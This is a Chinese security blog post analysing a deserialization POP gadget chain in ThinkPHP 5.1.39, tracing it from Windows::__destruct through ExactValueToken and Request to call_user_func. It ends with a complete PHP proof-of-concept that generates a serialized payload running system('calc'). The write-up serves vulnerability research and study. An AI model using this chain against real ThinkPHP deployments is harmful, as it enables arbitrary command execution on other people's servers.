<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="generator" content="Hexo 4.2.1"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><meta name="keywords" content="[object Object]"><meta name="description" content="[toc]
环境搭建
thinkphp5.1.39php7.3

从网上下载好源码，打开 application\index\controller\Index.php 文件写入如下代码："><meta name="author" content="Katharsis"><title>thinkphp_5.1.39反序列化分析 - Kath4rs1s</title><meta description="[toc] 环境搭建 thinkphp5.1.39php7.3  从网上下载好源码，打开 application\index\controller\Index.php 文件写入如下代码："><meta property="og:type" content="article"><meta property="og:title" content="thinkphp_5.1.39反序列化分析"><meta property="og:url" content="http://yoursite.com/2020/09/16/thinkphp-5-1-39/"><meta property="og:site_name" content="Katharsis"><meta property="og:description" content="[toc] 环境搭建 thinkphp5.1.39php7.3  从网上下载好源码，打开 application\index\controller\Index.php 文件写入如下代码："><meta property="og:locale" content="en_US"><meta property="article:published_time" content="2020-09-16T02:28:25.000Z"><meta property="article:modified_time" content="2020-09-16T05:08:57.831Z"><meta property="article:author" content="Katharsis"><meta property="article:tag" content="反序列化"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="http://yoursite.com/img/avatar.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://yoursite.com/2020/09/16/thinkphp-5-1-39/"},"headline":"thinkphp_5.1.39反序列化分析","image":["http://yoursite.com/img/avatar.png"],"datePublished":"2020-09-16T02:28:25.000Z","dateModified":"2020-09-16T05:08:57.831Z","author":{"@type":"Person","name":"Katharsis"},"description":"[toc] 环境搭建 thinkphp5.1.39php7.3  从网上下载好源码，打开 application\\index\\controller\\Index.php 文件写入如下代码："}</script><link rel="alternative" href="/atom.xml" title="Kath4rs1s" type="application/atom+xml"><link rel="icon" href="/img/favicon.png"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css?family=Ubuntu:400,600|Source+Code+Pro|Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Microsoft YaHei:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&amp;amp;subset=latin,latin-ext|Inconsolata|Itim|Lobster.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/highlight.js/9.12.0/styles/atom-one-dark.min.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.12/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/pace/1.0.2/pace.min.js"></script><link rel="stylesheet" href="/css/style.css"><script src="https://cdnjs.loli.net/ajax/libs/jquery/3.3.1/jquery.min.js"></script><script src="/js/globalUtils.js"></script></head><body class="is-3-column has-navbar-fixed-top"><nav class="navbar navbar-main is-fixed-top"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/123456.png" alt="Kath4rs1s" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item is-hidden-tablet catalogue" title="Catalogue" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a><a class="navbar-item" id="night-nav" title="Night Mode" href="javascript:;"><i class="fas fa-moon" id="night-icon"></i></a></div></div></div></nav><script type="text/javascript" src="/js/theme-setting.js"></script><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-9-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta size-small is-uppercase level is-mobile"><div class="level-left"><i class="far fa-calendar-plus"> </i>2020-09-16  <span class="level-item"><i class="far fa-clock"> </i>7 m  <i class="fas fa-pencil-alt"> </i>1.0 k</span><span class="level-item" id="busuanzi_container_page_pv"><i class="far fa-eye"></i>&nbsp;&nbsp;<span id="busuanzi_value_page_pv">0</span> visits</span></div></div><h1 class="title is-3 is-size-4-mobile">thinkphp_5.1.39反序列化分析</h1><div class="content"><p>[toc]</p>
<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><blockquote>
<p>thinkphp5.1.39<br>php7.3</p>
</blockquote>
<p>从网上下载好源码，打开 <strong>application\index\controller\Index.php</strong> 文件写入如下代码：</p>
<a id="more"></a>
<p><img src="/images/thinkphp5.1.39/20200916104528.png" alt=""></p>
<p>打开框架的debug模式，配置好phpstorm+chrome的调试模式，便可以开始了。</p>
<h2 id="反序列化"><a href="#反序列化" class="headerlink" title="反序列化"></a>反序列化</h2><p>搜索 <strong>__destruct()</strong> 方法，和thinkphp5.0.x一样，还是在 <strong>Windows</strong>类中</p>
<p><img src="/images/thinkphp5.1.39/20200916104940.png" alt=""></p>
<p>跟进 <strong>removeFiles()</strong></p>
<p><img src="/images/thinkphp5.1.39/20200916105249.png" alt=""></p>
<p>这里的 <strong>file_exists()</strong> 中的参数是可控的，其参数会被当做字符串处理，可以触发 <strong>__toString()</strong> 方法，搜索一下这个方法，很快就找到了，在 <strong>vendor\phpspec\prophecy\src\Prophecy\Argument\Token\ExactValueToken.php</strong> 文件下的 <strong>ExactValueToken</strong> 类中有一个可以利用的函数。</p>
<p><img src="/images/thinkphp5.1.39/20200916105804.png" alt=""></p>
<p>这里的 <strong>$this-&gt;util-&gt;stringify($this-&gt;value)</strong> 两个参数都是可控的，是可以完美触发 <strong>__call()</strong> 的地方，然后搜索一下__call()，在 <strong>Request</strong> 类中</p>
<p><img src="/images/thinkphp5.1.39/20200916110401.png" alt=""></p>
<p>__call方法的第一个参数是调用的那个不存在的方法，在这里也就是 <strong>stringify</strong> ，第二个参数以数组的方式传递，数组中的值是调用不存在方法时传递的参数。<br>在这里 <strong>$this-&gt;hook</strong> 是可控的，但是 <strong>array_unshift</strong>会把 <strong>$this</strong> 放到 <strong>$args</strong> 数组的第一个元素，我们只能</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">call_user_func_array([$obj,&quot;任意方法&quot;],[$this,任意参数])</span><br><span class="line">也就是</span><br><span class="line">$obj-&gt;$func($this,$argv)</span><br></pre></td></tr></table></figure>
<p>这样很难直接执行我们想要的函数，但是Thinkphp作为一个web框架,<br>Request类中有一个特殊的功能就是过滤器 filter(ThinkPHP的多个远程代码执行都是出自此处)<br>我们只能想办法通过调用别的方法来达到我们想要的结果，然后也是在 <strong>Request</strong> 类中找到了 <strong>filterValue</strong> 方法</p>
<p><img src="/images/thinkphp5.1.39/20200916121642.png" alt=""></p>
<p>这里可以调用 <strong>call_user_func</strong> 来执行任意函数，需要找一个调用 <strong>filterValue</strong> 的点，发现 <strong>input</strong> 方法符合条件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">    public function input($data &#x3D; [], $name &#x3D; &#39;&#39;, $default &#x3D; null, $filter &#x3D; &#39;&#39;)</span><br><span class="line">    &#123;</span><br><span class="line">        if (false &#x3D;&#x3D;&#x3D; $name) &#123;</span><br><span class="line">            &#x2F;&#x2F; 获取原始数据</span><br><span class="line">            return $data;</span><br><span class="line">        &#125;</span><br><span class="line">        ······</span><br><span class="line"></span><br><span class="line">        &#x2F;&#x2F; 解析过滤器</span><br><span class="line">        $filter &#x3D; $this-&gt;getFilter($filter, $default);</span><br><span class="line"></span><br><span class="line">        if (is_array($data)) &#123;</span><br><span class="line">            array_walk_recursive($data, [$this, &#39;filterValue&#39;], $filter);</span><br><span class="line">            if (version_compare(PHP_VERSION, &#39;7.1.0&#39;, &#39;&lt;&#39;)) &#123;</span><br><span class="line">                &#x2F;&#x2F; 恢复PHP版本低于 7.1 时 array_walk_recursive 中消耗的内部指针</span><br><span class="line">                $this-&gt;arrayReset($data);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            $this-&gt;filterValue($data, $name, $filter);</span><br><span class="line">        &#125;</span><br><span class="line">······</span><br></pre></td></tr></table></figure>
<p>但是这里的参数不可控，需要再寻找input参数可控的点，在 <strong>param()</strong> 中</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">public function param($name &#x3D; &#39;&#39;, $default &#x3D; null, $filter &#x3D; &#39;&#39;)</span><br><span class="line">&#123;</span><br><span class="line">    if (!$this-&gt;mergeParam) &#123;</span><br><span class="line">        $method &#x3D; $this-&gt;method(true);</span><br><span class="line">        ······</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">        &#x2F;&#x2F; 当前请求参数和URL地址中的参数合并</span><br><span class="line">        $this-&gt;param &#x3D; array_merge($this-&gt;param, $this-&gt;get(false), $vars, $this-&gt;route(false));</span><br><span class="line"></span><br><span class="line">        $this-&gt;mergeParam &#x3D; true;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    if (true &#x3D;&#x3D;&#x3D; $name) &#123;</span><br><span class="line">        &#x2F;&#x2F; 获取包含文件上传信息的数组</span><br><span class="line">        $file &#x3D; $this-&gt;file();</span><br><span class="line">        $data &#x3D; is_array($file) ? array_merge($this-&gt;param, $file) : $this-&gt;param;</span><br><span class="line">        return $this-&gt;input($data, &#39;&#39;, $default, $filter);</span><br><span class="line">    &#125;</span><br><span class="line">    return $this-&gt;input($this-&gt;param, $name, $default, $filter);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里只有 <strong>$this-&gt;param</strong> 是可控的，<strong>$filter</strong> 为空，需要再寻找调用 <strong>param()</strong> 的点，</p>
<p><img src="images/thinkphp5.1.39/20200916123501.png" alt=""></p>
<p>这里 <strong>isAjax()</strong> 参数时可控的，并且 <strong>param()</strong> 的参数 <code>$this-&gt;config\[&#39;var_ajax&#39;\]</code> 也是可控的，那这样 <strong>param()</strong> 中 <strong>$name</strong>也是可控的，再看 <strong>input()</strong> 方法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">    public function input($data &#x3D; [], $name &#x3D; &#39;&#39;, $default &#x3D; null, $filter &#x3D; &#39;&#39;)</span><br><span class="line">    &#123;</span><br><span class="line">        if (false &#x3D;&#x3D;&#x3D; $name) &#123;</span><br><span class="line">            &#x2F;&#x2F; 获取原始数据</span><br><span class="line">            return $data;</span><br><span class="line">        &#125;</span><br><span class="line">        ······</span><br><span class="line"></span><br><span class="line">            $data &#x3D; $this-&gt;getData($data, $name);</span><br><span class="line">            ······</span><br><span class="line"></span><br><span class="line">        &#x2F;&#x2F; 解析过滤器</span><br><span class="line">        $filter &#x3D; $this-&gt;getFilter($filter, $default);</span><br><span class="line"></span><br><span class="line">        if (is_array($data)) &#123;</span><br><span class="line">            array_walk_recursive($data, [$this, &#39;filterValue&#39;], $filter);</span><br><span class="line">            ······</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            $this-&gt;filterValue($data, $name, $filter);</span><br><span class="line">······</span><br></pre></td></tr></table></figure>
<p><strong>$data</strong> 来自 <strong>getData()</strong> 方法， <strong>$filter</strong> 来自 <strong>getFilter()</strong> ,先看一下 <strong>getData()</strong> </p>
<p><img src="/inages/thinkphp5.1.39/20200916125029.png" alt=""></p>
<p>这里 <strong>$data = $data[$val] = $data[$name]</strong> ，而 <strong>$name</strong> 是可控的，所以我们的 <strong>$data</strong> 也是可控的，<br>再看一下 <strong>getFilter()</strong> </p>
<p><img src="/images/thinkphp5.1.39/20200916125457.png" alt=""></p>
<p><strong>$filter = $filter ?: $this-&gt;filter;</strong>，也是可控的。<br>所以在 <strong>input()</strong>中调用 <strong>filterValue()</strong> 方法时的参数 <strong>$data</strong> 和 <strong>$filter</strong> 都是可控的，也就是 <strong>filterValue()</strong> 中我们调用 <strong>call_user_func</strong> 时的参数，这样整条pop链就算构造完成了。</p>
<h2 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">namespace think &#123;</span><br><span class="line">	class Request &#123;</span><br><span class="line">		protected $hook &#x3D; [];</span><br><span class="line">		protected $filter;</span><br><span class="line">		protected $config &#x3D; [];</span><br><span class="line">		protected $param &#x3D; [];</span><br><span class="line">		function __construct() &#123;</span><br><span class="line">			$this-&gt;hook &#x3D; [&#39;stringify&#39;&#x3D;&gt;[$this,&quot;isAjax&quot;]];</span><br><span class="line">			$this-&gt;filter &#x3D; [&#39;system&#39;];</span><br><span class="line">			$this-&gt;config[&#39;var_ajax&#39;] &#x3D; &#39;1&#39;;</span><br><span class="line">			$this-&gt;param &#x3D; [&#39;calc&#39;,&#39;1&#39;&#x3D;&gt;&#39;calc&#39;];</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">namespace Prophecy\Argument\Token &#123;</span><br><span class="line">	use think\Request;</span><br><span class="line">	class ExactValueToken &#123;</span><br><span class="line">		    private $value;</span><br><span class="line">		    private $string;</span><br><span class="line">		    private $util;</span><br><span class="line">		    function __construct() &#123;</span><br><span class="line">		    	$this-&gt;string &#x3D; null;</span><br><span class="line">		    	$this-&gt;util &#x3D; new Request();</span><br><span class="line">		    	$this-&gt;value &#x3D; [&#39;111&#39;];</span><br><span class="line">		    &#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">namespace think\process\pipes &#123;</span><br><span class="line">	use Prophecy\Argument\Token\ExactValueToken;</span><br><span class="line">	class Windows &#123;</span><br><span class="line">		private $files &#x3D; [];</span><br><span class="line">		function __construct() &#123;</span><br><span class="line">			$this-&gt;files &#x3D; [new ExactValueToken()];</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	$a &#x3D; new Windows();</span><br><span class="line">	echo urlencode(serialize($a));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>执行成功</p>
<p><img src="/images/thinkphp5.1.39/20200916130058.png" alt=""></p>
</div><ul class="post-copyright"><li><strong>Post Title: </strong><a href="http://yoursite.com/2020/09/16/thinkphp-5-1-39/">thinkphp_5.1.39反序列化分析</a></li><li><strong>Post Author: </strong><a href="http://yoursite.com">Katharsis</a></li><li><strong>Post Link: </strong><a href="http://yoursite.com/2020/09/16/thinkphp-5-1-39/">http://yoursite.com/2020/09/16/thinkphp-5-1-39/</a></li><li><strong>Copyright Notice: </strong><span>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> unless stating additionally.</span></li></ul><div><div class="recommend-post"><span class="is-size-6 has-text-grey has-mr-7"># Related Post</span><br><span>  1.<a class="is-size-6" href="/2020/09/25/thinkphp6/" target="_blank">thinkphp6反序列化链</a><br></span><span>  2.<a class="is-size-6" href="/2020/09/13/thinkphp5-rce/" target="_blank">thinkphp5.0.24反序列化pop链分析</a><br></span><span>  3.<a class="is-size-6" href="/2020/09/10/ciscn-laravel1/" target="_blank">ciscn2019 laravel反序列化利用链</a><br></span><span>  4.<a class="is-size-6" href="/2020/08/18/PHP-Audit-Labs/" target="_blank">代码审计之——PHP-Audit-Labs</a><br></span></div></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/css/share.min.css"><div class="social-share"></div><script src="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">Like this article? Support the author with</h3><div class="buttons is-centered"></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2020/09/16/PbootCMS-2-0-7/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">PbootCMS2.0.7前台任意文件包含漏洞复现</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2020/09/13/thinkphp5-rce/"><span class="level-item">thinkphp5.0.24反序列化pop链分析</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-4-widescreen  order-1 is-sticky"><div class="card widget toc-scroll" id="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">Catalogue</h3><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-环境搭建" href="#环境搭建"><span>环境搭建</span></a></li><li><a class="is-flex toc-item" id="toc-item-反序列化" href="#反序列化"><span>反序列化</span></a></li><li><a class="is-flex toc-item" id="toc-item-POC" href="#POC"><span>POC</span></a></li></ul></div></div><script type="text/javascript" async>
        $(document).ready(function () { //参考自 https://github.com/ppoffice/hexo-theme-icarus/pull/616/files
            var observerTopMargin;
            var scrollObserver;
            var headerElems = $(".headerlink");
            var activeTocItem;
        
            function initIntersectionObserver(docHeight) {
                observerTopMargin = docHeight;
                scrollObserver = new IntersectionObserver(scrollCallBack,
                    {
                        root: null,  // viewpoint
                        rootMargin: docHeight + "px 0px -80% 0px"  // cover top 30% of viewport to the top of document
                    })
            }
        
            function scrollCallBack(entries, observer) {
                if ($(window).scrollTop() > observerTopMargin * 0.7) { 
                    // User somehow scroll to 70% of observerTopMargin (which is inited as 200% document height)
                    // Observer top margin need to extend to cover all the space to the top of the document
                    initIntersectionObserver(observerTopMargin * 2)
                    observer.disconnect();
                    return;
                }
                let toActive;
                if (entries[0].intersectionRatio == 1) {  // enter viewed area
                    let entry = entries.reduce((u, v) => (u.target.toc_id > v.target.toc_id ? u : v));  // get the lowest item
                    toActive = $("#toc-item-" + $(entry.target).attr("href").substr(1));
                } else {
                    let entry = entries.reduce((u, v) => (u.target.toc_id < v.target.toc_id ? u : v));  // get the highest item
                    let idx = Math.max(entry.target.toc_id - 1, 0);
                    toActive = $("#toc-item-" + $(headerElems[idx]).attr("href").substr(1));
                }
                if (activeTocItem) activeTocItem.removeClass("is-current");
                activeTocItem = toActive
                activeTocItem.addClass("is-current");
            }
        
            initIntersectionObserver($(document).height() * 2);
            headerElems.each(function (index, obj) {
                obj.toc_id = index;
                scrollObserver.observe(obj);
            })
        });</script></div><div class="card widget"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="" src="/img/avatar.png" alt="Katharsis"></figure><p class="title is-size-4 is-block line-height-inherit">Katharsis</p><p class="is-size-6 is-block">^_^</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>中国</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">Posts</p><a href="/archives"><p class="title">20</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Categories</p><a href="/categories"><p class="title">5</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Tags</p><a href="/tags"><p class="title">4</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="/" target="_blank" rel="noopener">Follow</a></div><div class="level is-mobile"><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Github" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Weibo" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Email" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Next" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="RSS" href="/null"><i></i></a></div></div></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/123456.png" alt="Kath4rs1s" height="28"></a><p class="size-small"><span>&copy; 2020 Katharsis</span>  Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a>,Modify by <a href="https://github.com/removeif/hexo-theme-amazing" target="_blank">removeif</a> <br><span>© 版权说明：[本网站所有内容均收集于互联网或自己创作,<br />&nbsp;&nbsp;&nbsp;&nbsp;方便于网友与自己学习交流，如有侵权，请<a href="/message" target="_blank">留言</a>，立即处理]<br /></span><span><span id="statistic-times">loading...</span><script>function createTime(time) {
            var n = new Date(time);
            now.setTime(now.getTime() + 250),
                days = (now - n) / 1e3 / 60 / 60 / 24,
                dnum = Math.floor(days),
                hours = (now - n) / 1e3 / 60 / 60 - 24 * dnum,
                hnum = Math.floor(hours),
            1 == String(hnum).length && (hnum = "0" + hnum),
                minutes = (now - n) / 1e3 / 60 - 1440 * dnum - 60 * hnum,
                mnum = Math.floor(minutes),
            1 == String(mnum).length && (mnum = "0" + mnum),
                seconds = (now - n) / 1e3 - 86400 * dnum - 3600 * hnum - 60 * mnum,
                snum = Math.round(seconds),
            1 == String(snum).length && (snum = "0" + snum),
                document.getElementById("statistic-times").innerHTML = "❤️Site from <strong>"+time.split(" ")[0].replace(/\//g,".")+"</strong> has existed <strong>" + dnum + "</strong> d <strong>" + hnum + "</strong> h <strong>" + mnum + "</strong> m <strong>" + snum + "</strong> s！❤️";
        }var now = new Date();setInterval("createTime('2020/7/11 00:00:00')", 250,"");</script><br></span><div class="size-small"><span>❤️Thx <strong><span id="busuanzi_value_site_uv">99+</span></strong> users <strong><span id="busuanzi_value_site_pv">99+</span></strong> visited！❤️</span></div></p></div><div class="level-end"><div class="sideMusic"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css"><script src="/js/APlayer.min.js"></script><script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script><meting-js style="width: auto;height: 2000px;" server="netease" type="playlist" id="4978492128" theme="#2980b9" loop="all" autoplay="false" order="list" storageName="aplayer-setting" lrctype="0" list-max-height="400px" fixed="true"></meting-js></div></div></div></div></footer><script src="https://cdnjs.loli.net/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            site: {
                url: 'http://yoursite.com',
                external_link: {"enable":true,"exclude":[]}
            },
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="https://cdnjs.loli.net/ajax/libs/clipboard.js/2.0.4/clipboard.min.js" defer></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to Top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back-to-top.js" defer></script><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.12/js/lightgallery-all.min.js" defer></script><script src="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/js/jquery.justifiedGallery.min.js" defer></script><!--!--><!--!--><!--!--><script src="/js/toc.js" defer></script><script src="/js/main.js" defer></script><link rel="stylesheet" href="/css/insight.css"><div class="searchbox ins-search"><div class="searchbox-container ins-search-container"><div class="searchbox-input-wrapper"><input class="searchbox-input ins-search-input" type="text" placeholder="Type something..."><span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span></div><div class="searchbox-result-wrapper ins-section-wrapper"><div class="ins-section-container"></div></div></div></div><script>(function (window) {
            var INSIGHT_CONFIG = {
                TRANSLATION: {
                    POSTS: 'Posts',
                    PAGES: 'Pages',
                    CATEGORIES: 'Categories',
                    TAGS: 'Tags',
                    UNTITLED: '(Untitled)',
                },
                CONTENT_URL: '/content.json',
            };
            window.INSIGHT_CONFIG = INSIGHT_CONFIG;
        })(window);</script><script src="/js/insight.js" defer></script></body></html>